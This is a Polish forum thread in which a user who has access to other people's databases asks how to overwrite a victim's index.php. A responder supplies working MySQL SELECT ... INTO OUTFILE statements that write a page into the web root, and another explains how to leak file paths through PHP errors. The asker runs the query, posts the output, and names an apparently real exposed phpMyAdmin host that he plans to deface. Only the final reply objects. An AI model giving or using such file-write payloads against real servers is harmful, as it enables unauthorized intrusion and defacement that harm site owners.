Strona 1 z 3 123 OstatniOstatni
Pokaż wyniki 1 do 10 z 29

Temat: Zmiana index.php poprzez zapytanie SQL

  1. #1
    Zarejestrowany
    Mar 2011
    Postów
    19

    Domyślnie Zmiana index.php poprzez zapytanie SQL

    Witam, jak można zmienić zawartość index.php poprzez zapytanie SQL?
    Posiadam dostęp do bazy danych. Index.php znajduję się w folderze htdocs.

    Jak coś w celach naukowych.

  2. #2
    Zarejestrowany
    Jan 2011
    Postów
    22

    Domyślnie

    Zdaje mi się że nie rozumiesz czym jest SQL Injection. To wsztrzykiwanie zapytania "SQL". A co ma wspólnego baza danych z serwerem FTP, to przepraszam, ale nie mam pojęcia.

  3. #3
    Zarejestrowany
    Mar 2011
    Postów
    19

    Domyślnie

    To może inaczej.
    Jak mogę zmienić index.php poprzez bazę danych?
    Załóżmy mam dostęp do czyjejś bazy danych.
    Index znajduje się u innej osoby na komputerze w htdocs. Mogę go jakoś edytować poprzez bazę danych?

  4. #4
    Zarejestrowany
    Nov 2009
    Postów
    643

    Domyślnie

    Kod:
    CREATE TEMPORARY TABLE dbname.hack_me_hard ( payload TEXT );
    INSERT INTO dbname.hack_me_hard VALUES ('<html>hacked!</html>');
    SELECT * FROM dbname.hack_me_hard INTO OUTFILE 'c:/index.php';
    Zaznaczam że jestem noobem jeśli idzie o SQL, więc na bank można to zrobić lepiej..

    z INTO OUTFILE jest jeden mały problem - nie można nadpisywać istniejących plików..


    //edit
    Kod:
    SELECT ('<html>hacked!</html>') INTO OUTFILE 'c:/index.php';
    Udało się to trochę skrócić
    Ostatnio edytowane przez lame : 03-20-2012 - 21:51
    światło mądrości oświetla drogę z nikąd do nikąd

  5. #5
    Zarejestrowany
    Mar 2011
    Postów
    19

    Domyślnie

    O, widzę jeden rozsądny komentarz.
    Teraz kolejne pytanie: można jakoś "dopatrzeć" ścieżkę położenia indexu u ofiary poprzez bazę danych?

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Najprosciej znalezc cos co spowoduje wyswietlenie bledu aplikacji php - wiekszosc bledow pokazuje sciezke do pliku gdzie byl blad... ale zastanawia mnie to ze napisales ze index jest na innej maszynie niz baza danych... wtedy nic nie zrobisz taka metoda jak pokazana tutaj.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    Zarejestrowany
    Mar 2011
    Postów
    19

    Domyślnie

    Po wykonaniu zapytania:

    Kod:
    SELECT ('<html>Hacked! Check your security!</html>') INTO OUTFILE 'd:/xampp/htdocs/index.php';
    Dostaję komunikat zwrotny:
    Kod:
    Błąd
    
    zapytanie SQL: Dokumentacja
    
    SELECT (
    '<html>Hacked! Check your security!</html>'
    )
    INTO OUTFILE 'd:/xampp/htdocs/index.php'
    
    MySQL zwrócił komunikat: Dokumentacja
    #1086 - File 'd:/xampp/htdocs/index.php' already exists
    Ścieżko udało mi się dopatrzeć.

  8. #8
    Zarejestrowany
    Nov 2009
    Postów
    643

    Domyślnie

    Odpowiedź masz w moim poście powyżej. Przeczytaj uważnie co napisałem.
    światło mądrości oświetla drogę z nikąd do nikąd

  9. #9
    Zarejestrowany
    Mar 2011
    Postów
    19

    Domyślnie

    Źle się zrozumieliśmy.
    WSZYSTKO jest na jednej maszynie.
    Baza danych, strona i np. silnik.

    Tera patrzyłem serwery i znalazłem stronę bez zabezpieczonej bazy danych:
    warots76.no-ip.info/phpmyadmin

    Index na niej to konfiguracja xamppa i chciałbym, np. zrobić powiadomienie w indexie "Check your security!"
    Po przejsciu na głównej do phpinfo() jest napisane:
    d:/xampp/..

  10. #10
    Zarejestrowany
    Nov 2009
    Postów
    643

    Domyślnie

    Jeszcze raz przewiń do góry i przeczytaj mój post zamiast TQM'a.

    Srogo przeginasz pałe.
    Ostatnio edytowane przez lame : 03-21-2012 - 10:32
    światło mądrości oświetla drogę z nikąd do nikąd

Strona 1 z 3 123 OstatniOstatni

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj